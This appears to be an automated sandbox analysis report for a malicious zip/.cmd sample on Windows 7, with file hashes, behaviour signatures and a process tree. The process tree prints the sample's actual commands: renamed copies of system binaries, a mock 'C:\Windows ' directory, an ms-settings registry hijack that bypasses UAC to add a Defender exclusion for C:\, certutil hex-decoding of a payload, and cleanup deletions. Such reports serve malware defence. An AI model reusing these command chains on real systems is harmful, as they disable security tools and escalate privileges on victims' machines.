Analysis

  • max time kernel
    147s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    09-05-2024 09:54

General

  • Target

    17173318465.zip

  • Size

    1002KB

  • MD5

    ed0ed615d8c62f8a55f9b6d56b3b8aff

  • SHA1

    c91b96e4775a686c2bfcae1a9d8eb9f744de995a

  • SHA256

    99c9604c43f258385150f75b5df3e7d7a4a2c5364ed7d0ce592a90ea3b076323

  • SHA512

    db6fd59264b8fd3964235605c5eebad17bf4ac4caf111c84eb1689ebb42bb18a15cc36fc6d9361ab85bc02d165f14515ef3945c5ad34fe51bdb8af03a91e8c05

  • SSDEEP

    24576:m4SvFvkv07m+98vcV8+TPbk7ImwqtfK9f+hYz3G3Y/ummbLv:m4kFMc7398vwTRm9okOz3G3cov

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\17173318465.zip
    1⤵
      PID:2812
    • C:\Windows\system32\verclsid.exe
      "C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
      1⤵
        PID:2152
      • C:\Program Files\7-Zip\7zFM.exe
        "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\17173318465.zip"
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:2964
      • C:\Windows\system32\cmd.exe
        cmd /c ""C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd" "
        1⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2760
        • C:\Windows\System32\extrac32.exe
          C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
          2⤵
            PID:2688
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
            2⤵
            • Executes dropped EXE
            PID:2572
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
            2⤵
            • Executes dropped EXE
            PID:2528
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2544
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              3⤵
                PID:2596
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:3048
              • C:\Windows\system32\extrac32.exe
                extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                3⤵
                  PID:2148
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:1688
                • C:\Windows\system32\extrac32.exe
                  extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                  3⤵
                    PID:1168
                • C:\Windows\System32\extrac32.exe
                  C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\WSReset.exe "C:\\Windows \\System32\\itsme.exe"
                  2⤵
                    PID:2184
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:2864
                    • C:\Windows\system32\extrac32.exe
                      extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                      3⤵
                        PID:2828
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:2892
                      • C:\Users\Public\xkn.exe
                        C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2896
                        • C:\Users\Public\alpha.exe
                          "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:1468
                          • C:\Users\Public\ger.exe
                            C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                            5⤵
                            • Executes dropped EXE
                            • Modifies registry class
                            PID:308
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:1676
                      • C:\Users\Public\kn.exe
                        C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                        3⤵
                        • Executes dropped EXE
                        PID:1572
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:1608
                      • C:\Users\Public\kn.exe
                        C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                        3⤵
                        • Executes dropped EXE
                        PID:2764
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:1968
                      • C:\Windows\system32\taskkill.exe
                        taskkill /F /IM SystemSettings.exe
                        3⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1952
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
                      2⤵
                      • Executes dropped EXE
                      PID:2620
                      • C:\Windows\system32\PING.EXE
                        ping 127.0.0.1 -n 2
                        3⤵
                        • Runs ping.exe
                        PID:1632
                    • C:\Users\Public\Libraries\sppsvc.pif
                      C:\Users\Public\Libraries\sppsvc.pif
                      2⤵
                      • Executes dropped EXE
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1428
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 696
                        3⤵
                        • Loads dropped DLL
                        • Program crash
                        PID:1936
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                      2⤵
                      • Executes dropped EXE
                      PID:1772
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                      2⤵
                      • Executes dropped EXE
                      PID:2044
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                      2⤵
                      • Executes dropped EXE
                      PID:1212
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
                      2⤵
                      • Executes dropped EXE
                      PID:2260
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                      2⤵
                      • Executes dropped EXE
                      PID:2328
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                      2⤵
                      • Executes dropped EXE
                      PID:1508
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
                      2⤵
                      • Executes dropped EXE
                      PID:1904
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
                      2⤵
                      • Executes dropped EXE
                      PID:1076

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd

                    Filesize

                    3.2MB

                    MD5

                    366a8d4073f8409849e001e7feb3d894

                    SHA1

                    207a1fc1e41e3e7776511e692a9cb166d59d2d13

                    SHA256

                    5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3

                    SHA512

                    f262b68076974242a84fdd0b301a2307d550dfd9f884801902974e29f0a3d2dc0699e5aaad2c319e6aec87bcdf5190bc11cc938fc69d9668e3b85c57ed0ea51f

                  • C:\Users\Public\Libraries\sppsvc.pif

                    Filesize

                    1.1MB

                    MD5

                    e62ff91b6b729d830b15d8f81bc57ede

                    SHA1

                    38b3ac66c5899d0de5a91f66ecee1cb6e95b2973

                    SHA256

                    33a072ab2cc4195ed145081a2c88f2b000bdcae9c4b5989c7e9013feabb6ec59

                    SHA512

                    9ef30e503f09061a72560a384dd25c5028db46154cce430c1db7149cc697c795f86effd691167d61606402927087d0dc34366487ae7714b650bd42919e558d1f

                  • C:\Users\Public\sppsvc.rtf

                    Filesize

                    2.2MB

                    MD5

                    8ab8b1cab45b50b97ff80bff5e10291a

                    SHA1

                    966cd90ae89517d31fecc7bfaccec8703ddecfdb

                    SHA256

                    9b6ed53256341d48bc5981e48c8bb1e7547928143af4b33f0433468c7a4e11fd

                    SHA512

                    02adb968d9a6153fd055cff48aaa7c2328d41a5a14b88b7509955903a12e5c7a07ade608a7ffb54d9bfebe243a7f01d5c9655dcd3276110f32e5ee0b2c322cdf

                  • \Users\Public\alpha.exe

                    Filesize

                    337KB

                    MD5

                    5746bd7e255dd6a8afa06f7c42c1ba41

                    SHA1

                    0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

                    SHA256

                    db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

                    SHA512

                    3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

                  • \Users\Public\ger.exe

                    Filesize

                    73KB

                    MD5

                    9d0b3066fe3d1fd345e86bc7bcced9e4

                    SHA1

                    e05984a6671fcfecbc465e613d72d42bda35fd90

                    SHA256

                    4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

                    SHA512

                    d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

                  • \Users\Public\kn.exe

                    Filesize

                    1.1MB

                    MD5

                    ec1fd3050dbc40ec7e87ab99c7ca0b03

                    SHA1

                    ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

                    SHA256

                    1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

                    SHA512

                    4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

                  • \Users\Public\xkn.exe

                    Filesize

                    462KB

                    MD5

                    852d67a27e454bd389fa7f02a8cbe23f

                    SHA1

                    5330fedad485e0e4c23b2abe1075a1f984fde9fc

                    SHA256

                    a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

                    SHA512

                    327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

                  • memory/1428-69-0x0000000000400000-0x0000000000522000-memory.dmp

                    Filesize

                    1.1MB

                  • memory/2896-33-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

                    Filesize

                    2.9MB

                  • memory/2896-34-0x0000000000280000-0x0000000000288000-memory.dmp

                    Filesize

                    32KB